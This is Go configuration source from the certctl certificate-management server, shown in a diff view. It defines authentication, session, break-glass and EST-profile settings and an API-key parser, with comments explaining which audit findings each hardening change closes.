// AgentBootstrapToken is the pre-shared secret enforced on the agent
|
||||||
|
// registration endpoint (POST /api/v1/agents). Bundle-5 / Audit H-007 /
|
||||||
|
// CWE-306 + CWE-288: pre-Bundle-5, any host with network reach to the
|
||||||
|
// server could self-register an agent and start polling for work — no
|
||||||
|
// shared secret required. Post-Bundle-5: when this field is non-empty,
|
||||||
|
// the registration handler requires `Authorization: Bearer <token>`
|
||||||
|
// (constant-time comparison via crypto/subtle.ConstantTimeCompare); 401
|
||||||
|
// on missing/wrong/malformed.
|
||||||
|
//
|
||||||
|
// Backwards compatibility: when empty (the v2.0.x default), the server
|
||||||
|
// logs a startup WARN announcing the v2.2.0 deprecation — the field
|
||||||
|
// will become required in v2.2.0 and unset will fail-loud — and accepts
|
||||||
|
// registrations as today. Existing demo deploys that don't set it keep
|
||||||
|
// working through v2.1.x.
|
||||||
|
//
|
||||||
|
// Generation guidance: `openssl rand -hex 32` (256-bit entropy).
|
||||||
|
// Setting: CERTCTL_AGENT_BOOTSTRAP_TOKEN environment variable.
|
||||||
|
AgentBootstrapToken string
|
||||||
|
|
||||||
|
// AgentBootstrapTokenDenyEmpty is the staged feature flag for SEC-H1
|
||||||
|
// (Phase 2, 2026-05-13). When true AND AgentBootstrapToken is empty,
|
||||||
|
// Validate() returns ErrAgentBootstrapTokenRequired and the server
|
||||||
|
// refuses to start. Default: false (warn-mode pass-through preserved
|
||||||
|
// for backward compatibility with operators on the v2.1.x line).
|
||||||
|
// WORKSPACE-ROADMAP.md schedules the default flip to true for the
|
||||||
|
// v2.2.0 cut — operators get one upgrade-window to set a real token.
|
||||||
|
// Setting: CERTCTL_AGENT_BOOTSTRAP_TOKEN_DENY_EMPTY environment variable.
|
||||||
|
AgentBootstrapTokenDenyEmpty bool
|
||||||
|
|
||||||
|
// Session holds the Auth Bundle 2 Phase 4 session-service tunables.
|
||||||
|
// Defaults are documented on the SessionConfig fields. The session
|
||||||
|
// service is wired into cmd/server/main.go alongside the OIDC
|
||||||
|
// service in Phase 5; pre-Phase-5 deployments that run with the
|
||||||
|
// legacy `api-key` auth type ignore this struct entirely.
|
||||||
|
Session SessionConfig
|
||||||
|
|
||||||
|
// TrustedProxies is the comma-separated list of CIDR ranges from
|
||||||
|
// which X-Forwarded-For is honored. Empty (default) disables XFF
|
||||||
|
// trust entirely — every request's source IP is read from
|
||||||
|
// r.RemoteAddr regardless of XFF headers. Audit 2026-05-10 LOW-5
|
||||||
|
// closure: pre-fix the audit subsystem trusted any caller-supplied
|
||||||
|
// XFF for IP attribution, letting an attacker inject arbitrary IPs
|
||||||
|
// into audit rows + session IP-binding. Post-fix XFF is read only
|
||||||
|
// when the direct connection's RemoteAddr is in this allowlist.
|
||||||
|
// Setting: CERTCTL_TRUSTED_PROXIES (e.g. "10.0.0.0/8,192.168.0.0/16").
|
||||||
|
TrustedProxies []string
|
||||||
|
|
||||||
|
// DemoModeAck must be true to allow CERTCTL_AUTH_TYPE=none with a
|
||||||
|
// non-loopback listen address. Default false. Audit 2026-05-10
|
||||||
|
// HIGH-12 closure: pre-fix, an operator who flipped Type=none
|
||||||
|
// "temporarily" or via misconfig exposed admin functions to anyone
|
||||||
|
// reachable on port 8443 — the demo-mode synthetic actor
|
||||||
|
// `actor-demo-anon` is wired with `AdminKey=true`, so every
|
||||||
|
// request was served as a full admin. The control plane is
|
||||||
|
// HTTPS-only but a misconfigured ingress / public bind meant
|
||||||
|
// unauthenticated full admin. Post-fix: Validate() refuses to
|
||||||
|
// start when Type=none AND the listener binds to a non-loopback
|
||||||
|
// address (0.0.0.0, ::, or a routable IP) UNLESS the operator
|
||||||
|
// also sets DemoModeAck=true to acknowledge the bypass. Production
|
||||||
|
// deployments MUST set Type to a real authn type (api-key | oidc).
|
||||||
|
// Setting: CERTCTL_DEMO_MODE_ACK environment variable.
|
||||||
|
DemoModeAck bool
|
||||||
|
|
||||||
|
// DemoModeAckTS is the unix-epoch timestamp at which DemoModeAck was
|
||||||
|
// last acknowledged. Phase 2 SEC-H3 closure (2026-05-13): the sticky
|
||||||
|
// DemoModeAck bit now expires after 24h. When DemoModeAck=true,
|
||||||
|
// Validate() requires DemoModeAckTS to be set AND parse as a unix
|
||||||
|
// epoch within the last demoModeAckMaxAge (24h); otherwise
|
||||||
|
// ErrDemoModeAckExpired fires and the server refuses to start.
|
||||||
|
//
|
||||||
|
// This catches the canonical "demo deployment accidentally
|
||||||
|
// promoted to production and forgotten about" failure mode: the
|
||||||
|
// container restart that re-loads config now refuses unless the
|
||||||
|
// operator re-supplies a fresh timestamp.
|
||||||
|
//
|
||||||
|
// Setting: CERTCTL_DEMO_MODE_ACK_TS (unix epoch, e.g. `$(date +%s)`).
|
||||||
|
// The demo compose helper sets this automatically at compose-up.
|
||||||
|
DemoModeAckTS string
|
||||||
|
|
||||||
|
// DemoModeResidualStrict refuses startup when Auth.Type != none
|
||||||
|
// and `actor-demo-anon` has residual role grants in actor_roles.
|
||||||
|
// Default false (emit WARN log + audit row instead). Audit
|
||||||
|
// 2026-05-11 A-8 closure — closes the deferred Phase 2 leg of
|
||||||
|
// HIGH-12 (cowork/auth-bundles-fixes-2026-05-10/11-high-12-...).
|
||||||
|
//
|
||||||
|
// Note: migration 000029 unconditionally seeds the
|
||||||
|
// `ar-demo-anon-admin` grant of `r-admin` to `actor-demo-anon`
|
||||||
|
// for every install, so production deploys will see this WARN
|
||||||
|
// out of the box. The intended workflow at production cutover is:
|
||||||
|
// 1. POST /api/v1/auth/demo-residual/cleanup (or run the
|
||||||
|
// DELETE FROM actor_roles WHERE actor_id='actor-demo-anon'
|
||||||
|
// SQL emitted by the WARN).
|
||||||
|
// 2. Optionally set this flag for subsequent boots to refuse
|
||||||
|
// startup if the rows somehow get re-seeded.
|
||||||
|
//
|
||||||
|
// Setting: CERTCTL_DEMO_MODE_RESIDUAL_STRICT environment variable.
|
||||||
|
DemoModeResidualStrict bool
|
||||||
|
|
||||||
|
// OIDCBCLMaxAgeSeconds is the iat-freshness skew window for OIDC
|
||||||
|
// back-channel-logout tokens. logout_tokens with iat outside the
|
||||||
|
// window are rejected with audit outcome=iat_stale (in the past)
|
||||||
|
// or iat_future (in the future). Audit 2026-05-10 HIGH-3 closure.
|
||||||
|
// Default 60s matches the ID-token skew tolerance in
|
||||||
|
// internal/auth/oidc/service.go. Range: 10-300; values outside
|
||||||
|
// this window indicate IdP clock misconfiguration that warrants
|
||||||
|
// operator attention.
|
||||||
|
// Setting: CERTCTL_OIDC_BCL_MAX_AGE_SECONDS environment variable.
|
||||||
|
OIDCBCLMaxAgeSeconds int
|
||||||
|
|
||||||
|
// OIDCPreLoginRequireUA enables the RFC 9700 §4.7.1 user-agent
|
||||||
|
// binding check on /auth/oidc/callback. Audit 2026-05-10 MED-16.
|
||||||
|
// Default true. Operators on enterprise proxies that rewrite the
|
||||||
|
// UA header set this false; the binding value is still persisted
|
||||||
|
// + audited even when enforcement is off so retroactive forensics
|
||||||
|
// remain possible.
|
||||||
|
// Setting: CERTCTL_OIDC_PRELOGIN_REQUIRE_UA environment variable.
|
||||||
|
OIDCPreLoginRequireUA bool
|
||||||
|
|
||||||
|
// OIDCPreLoginRequireIP enables the RFC 9700 §4.7.1 source-IP
|
||||||
|
// binding check on /auth/oidc/callback. Audit 2026-05-10 MED-16.
|
||||||
|
// Default true. Operators on dual-stack v4/v6 or mobile
|
||||||
|
// carrier-grade NAT where source IP routinely flips set this
|
||||||
|
// false; persistence + audit behave the same as UA above.
|
||||||
|
// Setting: CERTCTL_OIDC_PRELOGIN_REQUIRE_IP environment variable.
|
||||||
|
OIDCPreLoginRequireIP bool
|
||||||
|
|
||||||
|
// Breakglass holds the Auth Bundle 2 Phase 7.5 break-glass admin
|
||||||
|
// tunables. Default-OFF; the entire surface is invisible (404
|
||||||
|
// instead of 403) when CERTCTL_BREAKGLASS_ENABLED is not true.
|
||||||
|
// Threat model: enabling break-glass is a deliberate bypass of
|
||||||
|
// the SSO security boundary; operators turn it on during SSO
|
||||||
|
// incidents and turn it off after recovery.
|
||||||
|
Breakglass BreakglassConfig
|
||||||
|
|
||||||
|
// BootstrapAdminGroups is the comma-separated list of IdP group
|
||||||
|
// names that grant the FIRST OIDC-authenticated user the r-admin
|
||||||
|
// role. Auth Bundle 2 Phase 7 / Decision 3. Empty (default)
|
||||||
|
// disables the OIDC-first-admin bootstrap path; the env-var-token
|
||||||
|
// path (BootstrapToken below) remains the fallback for fresh
|
||||||
|
// deployments without OIDC. When both are configured, OIDC wins
|
||||||
|
// on group match.
|
||||||
|
// Setting: CERTCTL_BOOTSTRAP_ADMIN_GROUPS environment variable.
|
||||||
|
BootstrapAdminGroups []string
|
||||||
|
|
||||||
|
// BootstrapOIDCProviderID restricts the OIDC-first-admin bootstrap
|
||||||
|
// path to a specific provider id (matches the seeded provider
|
||||||
|
// name in oidc_providers.id). Empty (default) accepts a match
|
||||||
|
// from any configured provider. Useful when an operator
|
||||||
|
// configures multiple IdPs and wants only the corporate IdP to
|
||||||
|
// be eligible for bootstrap.
|
||||||
|
// Setting: CERTCTL_BOOTSTRAP_OIDC_PROVIDER_ID environment variable.
|
||||||
|
BootstrapOIDCProviderID string
|
||||||
|
|
||||||
|
// BootstrapToken is the one-shot pre-shared secret that gates the
|
||||||
|
// Bundle 1 Phase 6 bootstrap endpoint (POST /v1/auth/bootstrap). When
|
||||||
|
// set at server startup AND no admin-roled actors exist, the
|
||||||
|
// bootstrap endpoint becomes callable: an operator POSTs the token
|
||||||
|
// and a desired admin-key name; the server mints a fresh API key,
|
||||||
|
// grants it the r-admin role, and returns the key value once. The
|
||||||
|
// token is then invalidated in memory; subsequent calls return 410
|
||||||
|
// Gone. The endpoint also returns 410 Gone when admin actors already
|
||||||
|
// exist (no need for the bootstrap path).
|
||||||
|
//
|
||||||
|
// Server NEVER logs this token. The minted admin key is returned in
|
||||||
|
// the HTTP response body only; not logged. Operators who lose track
|
||||||
|
// of the minted key can rotate it via the regular RBAC API after
|
||||||
|
// bootstrap.
|
||||||
|
//
|
||||||
|
// Generation guidance: `openssl rand -hex 32` (256-bit entropy).
|
||||||
|
// Setting: CERTCTL_BOOTSTRAP_TOKEN environment variable.
|
||||||
|
BootstrapToken string
|
||||||
|
}
|
||||||
|
|
||||||
|
// SessionConfig groups the tunables of the Auth Bundle 2 Phase 4 session
// service. Operators can override each field through its documented
// CERTCTL_SESSION_* environment variable; the defaults are the conservative
// values from the Phase 4 spec.
//
// Bundle 2 Phase 4 / OWASP ASVS V3 (Session Management). The defaults are
// 1h idle, 8h absolute, 24h key retention, 1h GC, Lax cookies, and no IP or
// User-Agent binding. Tightening to Strict cookies plus IP/UA binding suits
// high-security environments, at the cost of breaking inbound deep-links
// from external apps and login-from-mobile-on-cellular flows.
type SessionConfig struct {
	// IdleTimeout is the longest gap allowed between authenticated
	// requests on a session before re-authentication is required.
	// Default 1h. Env var: CERTCTL_SESSION_IDLE_TIMEOUT.
	IdleTimeout time.Duration

	// AbsoluteTimeout is the maximum lifetime of a session, regardless
	// of activity. Default 8h. Env var: CERTCTL_SESSION_ABSOLUTE_TIMEOUT.
	AbsoluteTimeout time.Duration

	// SigningKeyRetention is how long a retired signing key remains
	// valid for verification before it is purged from the keys table.
	// Default 24h. Env var: CERTCTL_SESSION_SIGNING_KEY_RETENTION.
	SigningKeyRetention time.Duration

	// GCInterval is the scheduler tick interval of the session-GC sweep.
	// Default 1h. Env var: CERTCTL_SESSION_GC_INTERVAL.
	GCInterval time.Duration

	// SameSite is the SameSite cookie attribute. Valid values: "Lax"
	// (default) or "Strict". Strict is recommended for high-security
	// environments, at the cost of breaking inbound deep-links from
	// external apps. Env var: CERTCTL_SESSION_SAMESITE.
	SameSite string

	// BindIP, when true, makes the session middleware compare the
	// request's client IP with the IP recorded on the session row on
	// every Validate. A mismatch yields 401 and an audit row; the
	// session is NOT auto-revoked, because the user may have a
	// legitimate IP change. Default false.
	// Env var: CERTCTL_SESSION_BIND_IP.
	BindIP bool

	// BindUserAgent, when true, makes the session middleware compare the
	// request's User-Agent with the UA recorded on the session row on
	// every Validate. Default false; useful only in tightly-controlled
	// environments. Env var: CERTCTL_SESSION_BIND_USER_AGENT.
	BindUserAgent bool
}
|
||||||
|
|
||||||
|
// BreakglassConfig groups the tunables of the Auth Bundle 2 Phase 7.5
// break-glass admin. Decision 4: an operator-toggleable local-password
// admin for the case where SSO is broken. It is off by default, and while
// Enabled=false the whole surface is invisible (404, NOT 403).
//
// Threat model (load-bearing): turning break-glass on deliberately bypasses
// the SSO security boundary. An attacker who phishes the password, OR finds
// it in a compromised password manager, bypasses MFA, OIDC, and every
// group-claim gate. Recommendation: keep CERTCTL_BREAKGLASS_ENABLED=false
// in steady-state, enable it only during SSO-broken incidents, and disable
// it after recovery. WebAuthn pairing (v3 per Decision 12) is the
// load-bearing second factor.
type BreakglassConfig struct {
	// Enabled gates the entire service surface. Default false.
	// Env var: CERTCTL_BREAKGLASS_ENABLED.
	Enabled bool

	// LockoutThreshold is the number of failures that trips the lockout.
	// Default 5. Env var: CERTCTL_BREAKGLASS_LOCKOUT_THRESHOLD.
	LockoutThreshold int

	// LockoutDuration is how long the account stays locked once the
	// threshold has tripped. Default 15m.
	// Env var: CERTCTL_BREAKGLASS_LOCKOUT_DURATION.
	LockoutDuration time.Duration

	// LockoutResetInterval is the idle time after last_failure_at after
	// which the failure counter resets to 0 on the next attempt.
	// Default 1h. Env var: CERTCTL_BREAKGLASS_LOCKOUT_RESET_INTERVAL.
	LockoutResetInterval time.Duration
}
|
||||||
|
|
||||||
|
// ParseNamedAPIKeys parses the CERTCTL_API_KEYS_NAMED environment variable.
|
||||||
|
// Format: "name1:key1,name2:key2:admin,name3:key3"
|
||||||
|
// The ":admin" suffix is optional; if present, the key has admin privileges.
|
||||||
|
// Returns a typed []NamedAPIKey so main.go can pass it directly to the
|
||||||
|
// middleware layer without type assertion gymnastics.
|
||||||
|
//
|
||||||
|
// Audit L-004 (CWE-924) — graceful key rotation contract:
|
||||||
|
//
|
||||||
|
// Two entries MAY share the same Name during a rotation overlap window:
|
||||||
|
// CERTCTL_API_KEYS_NAMED="alice:OLDKEY:admin,alice:NEWKEY:admin"
|
||||||
|
// When duplicates appear, both keys validate at the auth middleware
|
||||||
|
// (NewAuthWithNamedKeys iterates every entry on every request, so the
|
||||||
|
// match is by hash regardless of name collisions). Both produce the
|
||||||
|
// same UserKey context value (the shared name), which keeps the audit
|
||||||
|
// trail and per-user rate-limit bucket (Bundle B M-025) consistent
|
||||||
|
// across the rollover.
|
||||||
|
//
|
||||||
|
// The duplicate-name path is restricted: every entry sharing a name
|
||||||
|
// MUST carry the same admin flag — mixing admin=true with admin=false
|
||||||
|
// under the same identity would let a non-admin caller present the
|
||||||
|
// admin-flagged key and bypass the gate (or vice-versa). The contract
|
||||||
|
// is "rotate ONE key at a time"; the privilege level stays constant
|
||||||
|
// within the overlap window.
|
||||||
|
//
|
||||||
|
// Exact (name,key) duplicates are still rejected — that's a typo,
|
||||||
|
// not a rotation. Rotation requires DIFFERENT keys under the same
|
||||||
|
// name.
|
||||||
|
//
|
||||||
|
// Once the rollover is complete, the operator removes the OLDKEY
|
||||||
|
// entry and restarts. Single-entry steady state resumes.
|
||||||
|
//
|
||||||
|
// See docs/security.md::API key rotation for the full operator runbook.
|
||||||
|
func ParseNamedAPIKeys(input string) ([]NamedAPIKey, error) {
|
||||||
|
if input == "" {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
parts := splitComma(input)
|
||||||
|
var keys []NamedAPIKey
|
||||||
|
// nameToAdmin pins the admin flag for any name we've seen before; it
|
||||||
|
// is consulted on subsequent duplicate-name entries to enforce the
|
||||||
|
// "matching admin" contract above.
|
||||||
|
nameToAdmin := make(map[string]bool)
|
||||||
|
// nameSeen records whether we've seen a name at all (used to
|
||||||
|
// distinguish first-occurrence from duplicate-occurrence; we need
|
||||||
|
// this separate from nameToAdmin because admin=false is a valid
|
||||||
|
// recorded state).
|
||||||
|
nameSeen := make(map[string]bool)
|
||||||
|
// pairSeen rejects exact (name,key) duplicates as typos.
|
||||||
|
pairSeen := make(map[string]bool)
|
||||||
|
|
||||||
|
for _, part := range parts {
|
||||||
|
part = trimSpace(part)
|
||||||
|
if part == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Split by colon: name:key or name:key:admin
|
||||||
|
fields := strings.Split(part, ":")
|
||||||
|
if len(fields) < 2 || len(fields) > 3 {
|
||||||
|
return nil, fmt.Errorf("invalid named key format: %s (expected name:key or name:key:admin)", part)
|
||||||
|
}
|
||||||
|
|
||||||
|
name := trimSpace(fields[0])
|
||||||
|
key := trimSpace(fields[1])
|
||||||
|
admin := false
|
||||||
|
|
||||||
|
if len(fields) == 3 {
|
||||||
|
adminStr := trimSpace(fields[2])
|
||||||
|
if adminStr == "admin" {
|
||||||
|
admin = true
|
||||||
|
} else {
|
||||||
|
return nil, fmt.Errorf("invalid admin flag: %s (expected 'admin')", adminStr)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Validate name format: alphanumeric, hyphens, underscores
|
||||||
|
if !isValidKeyName(name) {
|
||||||
|
return nil, fmt.Errorf("invalid key name: %s (must be alphanumeric, hyphens, underscores)", name)
|
||||||
|
}
|
||||||
|
|
||||||
|
if key == "" {
|
||||||
|
return nil, fmt.Errorf("empty key for name: %s", name)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Typo guard: same (name,key) pair twice is never legitimate —
|
||||||
|
// rotation requires DIFFERENT keys under the same name.
|
||||||
|
pairKey := name + "\x00" + key
|
||||||
|
if pairSeen[pairKey] {
|
||||||
|
return nil, fmt.Errorf("duplicate (name,key) entry for name %q — rotation requires DIFFERENT keys under the same name", name)
|
||||||
|
}
|
||||||
|
pairSeen[pairKey] = true
|
||||||
|
|
||||||
|
// Duplicate-name path: allowed iff admin flag matches the prior
|
||||||
|
// entry for the same name (L-004 rotation overlap contract).
|
||||||
|
if nameSeen[name] {
|
||||||
|
priorAdmin := nameToAdmin[name]
|
||||||
|
if priorAdmin != admin {
|
||||||
|
return nil, fmt.Errorf("duplicate key name %q with mismatched admin flag — rotation overlap requires both entries carry the same privilege level (prior=%v, this=%v)", name, priorAdmin, admin)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
nameSeen[name] = true
|
||||||
|
nameToAdmin[name] = admin
|
||||||
|
}
|
||||||
|
|
||||||
|
keys = append(keys, NamedAPIKey{
|
||||||
|
Name: name,
|
||||||
|
Key: key,
|
||||||
|
Admin: admin,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// Rotation-window observability: emit a one-shot startup INFO log
|
||||||
|
// per name with multiple entries so operators can see the active
|
||||||
|
// overlap state in logs. (Single-entry steady state stays silent.)
|
||||||
|
nameCounts := make(map[string]int)
|
||||||
|
for _, k := range keys {
|
||||||
|
nameCounts[k.Name]++
|
||||||
|
}
|
||||||
|
for name, count := range nameCounts {
|
||||||
|
if count > 1 {
|
||||||
|
slog.Info("api-key rotation window active",
|
||||||
|
"name", name,
|
||||||
|
"entries", count,
|
||||||
|
"see", "docs/security.md::api-key-rotation",
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return keys, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// isValidKeyName reports whether s may be used as an API-key name.
//
// A valid name is non-empty and made up exclusively of ASCII letters, ASCII
// digits, hyphens and underscores. Any other rune (whitespace, punctuation,
// non-ASCII text) makes the whole name invalid.
func isValidKeyName(s string) bool {
	if s == "" {
		return false
	}
	for _, r := range s {
		switch {
		case 'a' <= r && r <= 'z':
		case 'A' <= r && r <= 'Z':
		case '0' <= r && r <= '9':
		case r == '-', r == '_':
		default:
			// First rune outside the allowed alphabet settles the answer.
			return false
		}
	}
	return true
}
|
||||||
+46
-2068
File diff suppressed because it is too large
Load Diff
@@ -203,8 +203,12 @@ func TestLoad_DefaultValues(t *testing.T) {
|
|||||||
if cfg.Database.URL != "postgres://localhost/certctl" {
|
if cfg.Database.URL != "postgres://localhost/certctl" {
|
||||||
t.Errorf("Database.URL = %q, want default", cfg.Database.URL)
|
t.Errorf("Database.URL = %q, want default", cfg.Database.URL)
|
||||||
}
|
}
|
||||||
if cfg.Database.MaxConnections != 25 {
|
// Phase 6 SCALE-M1 (2026-05-14): default bumped from 25 → 50 to
|
||||||
t.Errorf("Database.MaxConnections = %d, want 25", cfg.Database.MaxConnections)
|
// relieve pool-saturation pressure on 1K+ agent fleets. The
|
||||||
|
// CERTCTL_DATABASE_MAX_CONNS override still works for operators
|
||||||
|
// who want the smaller value back; this test pins the default.
|
||||||
|
if cfg.Database.MaxConnections != 50 {
|
||||||
|
t.Errorf("Database.MaxConnections = %d, want 50", cfg.Database.MaxConnections)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,396 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 4 (2026-05-14): extracted from
|
||||||
|
// config.go. Same complexity shape as Sprint 3 (SCEP). Two structs
|
||||||
|
// AND five unexported helpers move together:
|
||||||
|
//
|
||||||
|
// ESTConfig — top-level multi-profile EST config
|
||||||
|
// (Enabled + Profiles slice + legacy
|
||||||
|
// single-issuer flat fields kept for
|
||||||
|
// backward compat — fewer trigger
|
||||||
|
// fields than SCEP because EST has no
|
||||||
|
// per-profile RA pair or challenge
|
||||||
|
// password in this hardening-bundle
|
||||||
|
// phase).
|
||||||
|
// ESTProfileConfig — one EST endpoint's configuration
|
||||||
|
// (PathID + IssuerID + ProfileID +
|
||||||
|
// EnrollmentPassword + MTLS gate +
|
||||||
|
// channel-binding requirement +
|
||||||
|
// allowed-auth-modes + rate-limit +
|
||||||
|
// server-keygen gate). Field surface
|
||||||
|
// spans the full RFC 7030 hardening
|
||||||
|
// bundle's per-phase plans (Phases
|
||||||
|
// 2-5).
|
||||||
|
//
|
||||||
|
// loadESTProfilesFromEnv — reads CERTCTL_EST_PROFILES + expands
|
||||||
|
// each name into an ESTProfileConfig
|
||||||
|
// via the indexed env-var family.
|
||||||
|
// Mirrors loadSCEPProfilesFromEnv
|
||||||
|
// exactly.
|
||||||
|
// parseAuthModes — splits a comma-separated env value
|
||||||
|
// into a normalized []string of
|
||||||
|
// auth-mode tokens (lowercased +
|
||||||
|
// trimmed; empty input → nil).
|
||||||
|
// Exercised by
|
||||||
|
// config_est_profiles_test.go which
|
||||||
|
// is in package `config` so the
|
||||||
|
// unexported callable surface is
|
||||||
|
// preserved by the move.
|
||||||
|
// mergeESTLegacyIntoProfiles — backward-compat shim: synthesize
|
||||||
|
// Profiles[0] from the legacy
|
||||||
|
// single-issuer fields when Profiles
|
||||||
|
// is empty AND EST is enabled.
|
||||||
|
// validESTPathID — path-segment validator (ASCII
|
||||||
|
// [a-z0-9-], no leading/trailing
|
||||||
|
// hyphen, empty allowed). Kept as a
|
||||||
|
// separate function from
|
||||||
|
// validSCEPPathID so future
|
||||||
|
// EST-specific path constraints
|
||||||
|
// (e.g. RFC 7030 §3.2.2 reserved
|
||||||
|
// segments) can land without
|
||||||
|
// affecting SCEP.
|
||||||
|
// validESTAuthMode — refuses unknown auth-mode tokens at
|
||||||
|
// startup ("mtls" and "basic" are
|
||||||
|
// the valid set in Phase 1; future
|
||||||
|
// phases may add).
|
||||||
|
//
|
||||||
|
// All callers stay in config.go and continue to resolve via
|
||||||
|
// same-package lookup. Specifically:
|
||||||
|
// - Load() calls loadESTProfilesFromEnv() during initial cfg.EST
|
||||||
|
// construction.
|
||||||
|
// - Load() calls mergeESTLegacyIntoProfiles(&cfg.EST) after the
|
||||||
|
// initial profile-load.
|
||||||
|
// - loadESTProfilesFromEnv() itself calls parseAuthModes() —
|
||||||
|
// intra-helper call that stays inside est.go after the move
|
||||||
|
// (one less cross-file edge).
|
||||||
|
// - Validate() calls validESTPathID(p.PathID) per-profile.
|
||||||
|
// - Validate() calls validESTAuthMode(mode) per auth-mode in
|
||||||
|
// each profile's AllowedAuthModes slice.
|
||||||
|
// - config_est_profiles_test.go (package `config`) directly tests
|
||||||
|
// parseAuthModes — that test file isn't touched by the move
|
||||||
|
// because parseAuthModes stays in the same package.
|
||||||
|
//
|
||||||
|
// The unexported helpers getEnv / getEnvBool / getEnvInt used by
|
||||||
|
// loadESTProfilesFromEnv also stay in config.go (shared across every
|
||||||
|
// config family); same-package resolution makes the calls work
|
||||||
|
// without any import change.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: `go doc internal/config ESTConfig` and
|
||||||
|
// `go doc internal/config ESTProfileConfig` produce identical output
|
||||||
|
// before and after this split. Unexported helpers are unaffected by
|
||||||
|
// `go doc`.
|
||||||
|
|
||||||
|
// ESTConfig controls the RFC 7030 Enrollment over Secure Transport server.
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 1: this type was originally a
|
||||||
|
// flat single-issuer struct. Real enterprise deployments need to expose
|
||||||
|
// multiple EST endpoints from one certctl instance — corp-laptop CA, IoT
|
||||||
|
// CA, WiFi/802.1X CA — each with its own issuer + auth modes + URL path
|
||||||
|
// (/.well-known/est/<pathID>/). The Profiles slice carries that. Existing
|
||||||
|
// operators see no behavior change: when Profiles is empty AND the legacy
|
||||||
|
// single-issuer flat fields below are set, ConfigLoad synthesizes a
|
||||||
|
// single-element Profiles[0] with PathID="" (which maps to the legacy
|
||||||
|
// /.well-known/est/ root path).
|
||||||
|
type ESTConfig struct {
|
||||||
|
// Enabled controls whether EST endpoints are available for device enrollment.
|
||||||
|
// Default: false (EST disabled). Set to true to enable RFC 7030 endpoints
|
||||||
|
// under /.well-known/est/ (cacerts, simpleenroll, simplereenroll, csrattrs).
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// IssuerID selects which issuer connector processes EST certificate requests.
|
||||||
|
// Default: "iss-local". Legacy single-issuer field; merged into Profiles[0]
|
||||||
|
// by mergeESTLegacyIntoProfiles when Profiles is empty.
|
||||||
|
IssuerID string
|
||||||
|
|
||||||
|
// ProfileID optionally constrains EST enrollments to a specific certificate profile.
|
||||||
|
// Legacy single-issuer field; merged into Profiles[0] when applicable.
|
||||||
|
ProfileID string
|
||||||
|
|
||||||
|
// Profiles is the multi-endpoint configuration. Each profile gets its own
|
||||||
|
// URL path (/.well-known/est/<PathID>/), its own bound issuer, its own auth
|
||||||
|
// modes, and its own per-profile policy knobs (rate limit, server-keygen
|
||||||
|
// gate, mTLS bundle, RFC 9266 channel-binding requirement). Population
|
||||||
|
// sources, in priority order:
|
||||||
|
//
|
||||||
|
// 1. Explicit list via CERTCTL_EST_PROFILES (e.g. "corp,iot,wifi").
|
||||||
|
// 2. Backward-compat shim: when CERTCTL_EST_PROFILES is unset AND the
|
||||||
|
// legacy flat fields above are populated AND Enabled=true, ConfigLoad
|
||||||
|
// synthesizes a single-element Profiles[0] with PathID="" so
|
||||||
|
// /.well-known/est/ continues to route the same way it did
|
||||||
|
// pre-Phase-1.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 1.
|
||||||
|
Profiles []ESTProfileConfig
|
||||||
|
}
|
||||||
|
|
||||||
|
// ESTProfileConfig describes a single EST endpoint. A profile binds one
// issuer, one optional certctl CertificateProfile and one set of accepted
// auth modes (mTLS, HTTP Basic, or both) to a URL path segment.
//
// Phase 1 of the EST RFC 7030 hardening master bundle lays down the field
// contracts and the per-profile Validate() gates, so that an operator who
// sets MTLSEnabled=true without supplying the bundle path gets a loud
// refuse-to-start error rather than a silent no-op. The handlers that
// consume the remaining fields ship in later phases:
//
//   - Phase 2 reads MTLSEnabled, MTLSClientCATrustBundlePath and
//     ChannelBindingRequired to enable the /.well-known/est-mtls/<PathID>
//     sibling route (mirrors SCEP's /scep-mtls/<PathID> from commit e7a3075).
//   - Phase 3 reads EnrollmentPassword and AllowedAuthModes to enforce HTTP
//     Basic auth on the standard /.well-known/est/<PathID>/ route.
//   - Phase 4 reads RateLimitPerPrincipal24h to apply per-CN+source-IP
//     sliding-window rate limiting (mirrors SCEP/Intune's
//     PerDeviceRateLimiter from internal/scep/intune/rate_limit.go).
//   - Phase 5 reads ServerKeygenEnabled to gate the /serverkeygen endpoint
//     per RFC 7030 §4.4.
//
// EST RFC 7030 hardening master bundle Phase 1.
type ESTProfileConfig struct {
	// PathID is the URL segment that follows /.well-known/est/. The empty
	// string maps to the legacy /.well-known/est/ root, so operators still on
	// the flat single-issuer config see no URL change. A non-empty value
	// MUST be a single path-safe slug ([a-z0-9-], no slashes); this is
	// checked at startup by Config.Validate(). Multi-profile deployments
	// typically pick short tokens such as "corp", "iot" or "wifi", giving
	// URLs like /.well-known/est/corp/cacerts and
	// /.well-known/est/iot/simpleenroll.
	PathID string

	// IssuerID names the issuer connector this profile's enrollments are
	// sent through. It must reference a configured issuer and is required
	// (Validate refuses an empty IssuerID).
	IssuerID string

	// ProfileID optionally pins enrollments under this PathID to a specific
	// CertificateProfile. Leave it empty to accept the issuer's defaults.
	// When set, the profile's crypto policy (allowed key algorithms,
	// required EKUs, max TTL) is enforced at enrollment time via
	// service.ValidateCSRAgainstProfile.
	ProfileID string

	// EnrollmentPassword is the per-profile shared secret for HTTP Basic
	// auth on the standard /.well-known/est/<PathID>/ route (Phase 3). An
	// empty value means HTTP Basic auth is NOT required for this profile
	// (mTLS-only or anonymous, depending on AllowedAuthModes). The value is
